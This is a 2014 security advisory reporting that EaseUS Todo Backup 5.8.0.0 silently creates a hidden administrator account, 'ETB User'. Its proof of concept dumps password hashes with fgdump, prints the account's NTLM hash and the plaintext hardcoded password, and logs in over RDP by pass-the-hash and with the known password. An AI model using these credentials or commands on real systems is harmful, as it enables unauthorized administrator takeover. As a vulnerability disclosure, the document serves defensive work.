EaseUS Todo Backup 5.8.0.0 Hardcoded Password



EKU-ID: 3904 CVE: OSVDB-ID:
Author: Akastep Published: 2014-03-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Vulnerable Software: 
========================================
EaseUS Todo Backup 5.8.0.0  (build 20130321)

http://oi62.tinypic.com/108i4ut.jpg
========================================
Vuln: Hardcoded Administrative Password./Potential backdoor.
========================================
Impact:
An attacker exploiting this vulnerability could assume greater privileges on a compromised system, allowing them to potentially destroy data or take control of computers for malicious purposes. 
========================================
About software:

Designed for small and medium-sized businesses.
Simplify backup & recovery management to minimize server downtime and ensure business continuity
========================================
Vuln details:

EaseUS Todo Backup 5.8.0.0  (build 20130321) 
(other versions may also suffer from this but not tested)

when installing it on your machine creates hidden Administrative local account on your machine with hardcoded/broken password.

But this can be abused by remote attackers as well.
Using this administrative account remote/local attacker may completely compromise target machine.




Here is few Proof of concept demonstrations:


*Before installation ("net user" command on target machine)*

C:\Users\Administrator>NET USER

User accounts for \\WIN-CE1QUVOKT1H

---------------------------------------------------------------------------
Administrator            Guest
The command completed successfully.


*After installation complete: (Notice: we've got new local administrative account in silent manner!)*

C:\Users\Administrator>NET USER

User accounts for \\WIN-CE1QUVOKT1H

---------------------------------------------------------------------------
Administrator            ETB User                 Guest
The command completed successfully.


C:\Users\Administrator>NET USER

User accounts for \\WIN-CE1QUVOKT1H

---------------------------------------------------------------------------
Administrator            ETB User                 Guest
The command completed successfully.


C:\Users\Administrator>control userpasswords2

C:\Users\Administrator>cd Desktop

C:\Users\Administrator\Desktop>fgdump.exe
fgDump 2.1.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright(C) 2008 fizzgig and foofus.net
fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
more information.

No parameters specified, doing a local dump. Specify -? if you are looking
elp.
--- Session ID: 2014-03-22-05-13-53 ---
Starting dump on 127.0.0.1

** Beginning local dump **
OS (127.0.0.1): Microsoft Windows Unknown Server (Build 9600) (64-bit)
Passwords dumped successfully
Cache dumped successfully

-----Summary-----

Failed servers:
NONE

Successful servers:
127.0.0.1

Total failed: 0
Total successful: 1




C:\Users\Administrator\Desktop>net user

User accounts for \\WIN-CE1QUVOKT1H

---------------------------------------------------------------------------
Administrator            ETB User                 Guest
The command completed successfully.


C:\Users\Administrator\Desktop>net user "ETB User"
User name                    ETB User
Full Name                    ETB User
Comment                      For EaseUS Todo Backup Central Management Cons
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            3/21/2014 10:12:52 PM
Password expires             Never
Password changeable          3/21/2014 10:12:52 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.


C:\Users\Administrator\Desktop>



C:\Users\Administrator\Desktop>type 127.0.0.1.pwdump
---------- SNIP ----------------
ETB User:1001:NO PASSWORD*********************:DE0F2B9AAEDF6BF59FED68AB06C334C2:
---------- SNIP ----------------


This hardcoded administive password filtrates in wild:

Pass: ~1EaseUs@AcsT

http://forum.insidepro.com/viewtopic.php?t=8677&start=420&sid=ed953995a5aa360b9c5be3f1472328d6




Trying to logon to this account:


Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
win-ce1quvokt1h\etb user

C:\Windows\system32>whoami /all

USER INFORMATION
----------------

User Name                SID
======================== =============================================
win-ce1quvokt1h\etb user S-1-5-21-140604893-3061859077-1642753036-1001


GROUP INFORMATION
-----------------

Group Name                                                    Type             S
ID          Attributes
============================================================= ================ =
=========== ==================================================
Everyone                                                      Well-known group S
-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S
-1-5-114    Group used for deny only
BUILTIN\Administrators                                        Alias            S
-1-5-32-544 Group used for deny only
BUILTIN\Users                                                 Alias            S
-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S
-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S
-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S
-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S
-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S
-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S
-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S
-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S
-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled


C:\Windows\system32>exit


Testing for lovely Pass The Hash technique:
Result is successfull against Server 2012 R2



[blackhat@localhost FreeRDP]$ xfreerdp -u "ETB User" -p DE0F2B9AAEDF6BF59FED68AB06C334C2 192.168.1.103
WARNING: Using deprecated command-line interface!
-p ****** -> /p:******
-u ETB User -> /u:ETB User
192.168.1.103 -> /v:192.168.1.103
connected to 192.168.1.103:3389
Closed from X11

PIC 1:
http://oi58.tinypic.com/2z8b7t4.jpg






Or using valid and hardcoded+known credentials:

[blackhat@localhost ~]$ rdesktop -u "ETB User" -p ~1EaseUs@AcsT 192.168.1.103
Autoselected keyboard map en-us
Connection established using SSL.
WARNING: Remote desktop does not support colour depth 24; falling back to 16



PIC 2:

http://oi60.tinypic.com/2j459pk.jpg





===================== WITH LOVE FROM AZERBAIJAN ========================

packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
exploit-db.com
insecurety.net
millikuvvetler.net
b3yaz.org

Special respect's to CAMOUFL4G3 && ottoman38 and to all 
Azerbaijan Black hatz,Aa team && to All Turkish hackers.

/AkaStep